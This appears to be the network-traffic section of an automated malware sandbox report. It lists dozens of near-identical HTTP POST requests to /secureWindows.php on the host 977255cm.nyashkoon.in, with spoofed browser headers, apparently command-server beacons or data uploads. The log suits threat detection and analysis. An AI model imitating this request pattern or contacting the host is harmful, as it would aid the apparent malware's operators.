                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /secureWindows.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 977255cm.nyashkoon.in | Content-Length: 1072 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /secureWindows.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 977255cm.nyashkoon.in | Content-Length: 1072 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /secureWindows.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 | Host: 977255cm.nyashkoon.in | Content-Length: 1312 | Expect: 100-continue | Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1312Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1072Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 977255cm.nyashkoon.in Content-Length: 1072 Expect: 100-continue
                              Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 977255cm.nyashkoon.in Content-Length: 1312 Expect: 100-continue Connection: Keep-Alive
                              Source: global traffic HTTP traffic detected: POST /secureWindows.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 977255cm.nyashkoon.in Content-Length: 1064 Expect: 100-continue Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /secureWindows.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 977255cm.nyashkoon.inContent-Length: 1076Expect: 100-continue
